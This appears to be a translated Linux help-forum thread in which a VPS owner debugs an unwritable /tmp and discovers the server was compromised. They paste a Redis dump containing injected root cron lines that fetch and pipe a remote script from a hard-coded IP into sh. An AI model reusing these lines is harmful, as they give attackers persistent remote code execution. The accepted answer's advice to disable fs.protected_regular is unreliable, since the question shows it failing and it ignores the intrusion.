我无法在 /tmp 目录中写入内容。
以非 root 用户身份执行此操作:
europasprak@vps-xxxxxxxx:~$ echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted
和
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' | sudo tee /tmp/dummy
tee: /tmp/dummy: Operation not permitted
以及 root 用户:
root@vps-xxxxxxxx:~# echo 'ok' > /tmp/dummy
bash: /tmp/dummy: Operation not permitted
它甚至在询问sudo
密码之前就拒绝了:
Last login: Wed Aug 18 19:38:33 2021 from 91.168.98.130
europasprak@vps-3506b083:~$ sudo echo 'ok' > /tmp/dummy2
-bash: /tmp/dummy2: Operation not permitted
有趣的是,它拒绝以 root 身份在以下命令中设置时间:
root@vps-xxxxxxxx:/home/europasprak# touch /tmp/ok
touch: setting times of '/tmp/ok': No such file or directory
这个问题今天早上就出现了。
该机器是:
europasprak@vps-xxxxxxxx:~$ uname -a
Linux vps-xxxxxxxx 5.8.0-63-generic #71-Ubuntu SMP Tue Jul 13 15:59:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
分区:
europasprak@vps-xxxxxxxx:~$ df
Filesystem 1K-blocks Used Available Use% Mounted on
tmpfs 795424 1072 794352 1% /run
/dev/sda1 162420480 59362024 103042072 37% /
tmpfs 3977116 0 3977116 0% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 4096 0 4096 0% /sys/fs/cgroup
/dev/sda15 106858 8008 98851 8% /boot/efi
overlay 162420480 59362024 103042072 37% /home/europasprak/programs/install/docker/overlay2/2f1f82255bbd13b61ea151363e46880c4902b4b822fca15078fb9a10461111df/merged
europasprak@vps-xxxxxxxx:~$ df -i
Filesystem Inodes IUsed IFree IUse% Mounted on
tmpfs 994279 640 993639 1% /run
/dev/sda1 20643840 523620 20120220 3% /
tmpfs 994279 4 994275 1% /dev/shm
tmpfs 994279 3 994276 1% /run/lock
tmpfs 1024 18 1006 2% /sys/fs/cgroup
/dev/sda15 0 0 0 - /boot/efi
更多输出:
europasprak@vps-xxxxxxxx:~$ ls -ld /tmp
drwxrwxrwt 12 root root 4096 août 18 05:45 /tmp
europasprak@vps-xxxxxxxx:~$ lsattr /tmp
--------------e----- /tmp/dump.rdb
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-timesyncd.service-11J2sh
lsattr: Permission denied While reading flags on /tmp/tmp.40xGrsPHCk
--------------e----- /tmp/exp_lin.so
--------------e----- /tmp/oi_plugins.php
--------------e----- /tmp/backup.db
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-logind.service-ffm01g
lsattr: Permission denied While reading flags on /tmp/systemd-private-b0ce13ad416741f3ba842d3821949044-systemd-resolved.service-E7ECGg
--------------e----- /tmp/xm4.tgz
lsattr: Permission denied While reading flags on /tmp/snap.lxd
更新:我尝试安装acl
但明显失败:
europasprak@vps-xxxxxxxx:~$ sudo apt install acl
Reading package lists... Error!
E: Unable to mkstemp /tmp/clearsigned.message.VjQNL9 - GetTempFile (1: Operation not permitted)
E: The package lists or status file could not be parsed or opened.
europasprak@vps-xxxxxxxx:~$ sudo apt update
Err:1 http://security.ubuntu.com/ubuntu groovy-security InRelease
Temporary failure resolving 'security.ubuntu.com'
Err:2 https://download.docker.com/linux/ubuntu groovy InRelease
Temporary failure resolving 'download.docker.com'
Err:3 http://ppa.launchpad.net/ultradvorka/ppa/ubuntu groovy InRelease
Temporary failure resolving 'ppa.launchpad.net'
Err:4 http://nova.clouds.archive.ubuntu.com/ubuntu groovy InRelease
Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Err:5 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-updates InRelease
Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Err:6 http://nova.clouds.archive.ubuntu.com/ubuntu groovy-backports InRelease
Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
Reading package lists... Error!
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy/InRelease Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-updates/InRelease Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://nova.clouds.archive.ubuntu.com/ubuntu/dists/groovy-backports/InRelease Temporary failure resolving 'nova.clouds.archive.ubuntu.com'
W: Failed to fetch http://security.ubuntu.com/ubuntu/dists/groovy-security/InRelease Temporary failure resolving 'security.ubuntu.com'
W: Failed to fetch https://download.docker.com/linux/ubuntu/dists/groovy/InRelease Temporary failure resolving 'download.docker.com'
W: Failed to fetch http://ppa.launchpad.net/ultradvorka/ppa/ubuntu/dists/groovy/InRelease Temporary failure resolving 'ppa.launchpad.net'
W: Some index files failed to download. They have been ignored, or old ones used instead.
E: Unable to mkstemp /tmp/clearsigned.message.cOHaS4 - GetTempFile (1: Operation not permitted)
E: The package lists or status file could not be parsed or opened.
更新:我也尝试过关闭一个设置,但是没有帮助:
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted
europasprak@vps-xxxxxxxx:~$ sudo sysctl fs.protected_regular=0
[sudo] password for europasprak:
fs.protected_regular = 0
europasprak@vps-xxxxxxxx:~$ sudo echo 'ok' > /tmp/dummy
-bash: /tmp/dummy: Operation not permitted
VPS 是一个 kvm 实例:
europasprak@vps-xxxxxxxx:~$ sudo virt-what
kvm
更新:
europasprak@vps-xxxxxxxx:~$ sudo journalctl --boot --priority=4
[sudo] password for europasprak:
-- Logs begin at Thu 2021-04-01 18:46:32 UTC, end at Sun 2021-08-22 13:54:48 UTC. --
août 20 20:52:46 vps-3506b083 kernel: #2
août 20 20:52:46 vps-3506b083 kernel: #3
août 20 20:52:46 vps-3506b083 kernel: acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge.
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: EISA: Cannot allocate resource for mainboard
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 1
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 2
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 3
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 4
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 5
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 6
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 7
août 20 20:52:46 vps-3506b083 kernel: platform eisa.0: Cannot allocate resource for EISA slot 8
août 20 20:52:46 vps-3506b083 kernel: sd 2:0:0:0: Power-on or device reset occurred
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/plymouth-start.service:17: Unit configured to use KillMode=none. This is unsafe, as it disables>
août 20 20:52:46 vps-3506b083 systemd[1]: /lib/systemd/system/dbus.service:12: Unit configured to use KillMode=none. This is unsafe, as it disables systemd's>
août 20 20:52:46 vps-3506b083 systemd-udevd[413]: Could not set WakeOnLan of ens3 to off: Operation not supported
août 20 20:52:48 vps-3506b083 systemd-networkd[658]: /run/systemd/network/10-netplan-ens3.network: MTUBytes= in [Link] section and UseMTU= in [DHCP] section >
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/crontab
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/cron.d/zzh
août 20 20:52:50 vps-3506b083 cron[702]: Error: bad minute; while reading /etc/cron.d/dog
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '3' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:51 vps-3506b083 systemd-networkd[658]: rtnl: received neighbor for link '4' we don't know about, ignoring.
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: testvxlan: Failed to get link config: No such device
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vx-001000-z6tjy: Failed to get link config: No such device
août 20 20:52:53 vps-3506b083 systemd-udevd[413]: vethe97279b: Could not generate persistent MAC: No data available
août 20 20:52:53 vps-3506b083 systemd-udevd[417]: vethe514997: Could not generate persistent MAC: No data available
août 20 20:52:53 vps-3506b083 systemd-networkd[658]: vethe97279b: Failed to wait for the interface to be initialized: No such device
europasprak@vps-3506b083:~$
更新:我发现我的 /etc/crontab 文件已被篡改。我的系统已被黑客入侵。奇怪的是,似乎没有任何挖矿活动。我想我需要完全重新安装系统。
REDIS0006þ^@^@^Gbackup3Ã@Q@X^G
*/4 * ^A^_root curl -fsSL http://199.19.22^T6.117/b2f628fff19fda9À^@^K/b.sh | sh
^@^Gbackup1@F
*/2 * * * * root cd1 -fsSL http://199.19.226.117/b2f628/b.sh | sh
^@^Gbackup4Ã@Q@X^G
*/5 * ^A^_root wd1 -q -O- http://199.19.22^T6.117/b2f628fff19fda9À^@^K/b.sh | sh
^@^Gbackup2@H
*/3 * * * * root wget -q -O- http://199.19.226.117/b2f628/b.sh | sh
ÿWìðr<90><93>^Gæ
答案1
这是 Ubuntu 20.04+ 中的标准行为,因为fs.protected_regularLinux 内核参数。您可以尝试这样禁用它
sudo sysctl fs.protected_regular=0
看看你是否可以写信给/tmp现在
如果您想使 fs.protected_regular=0 更改永久生效,请将其添加到 /usr/lib/sysctl.d/protect-links.conf 文件中。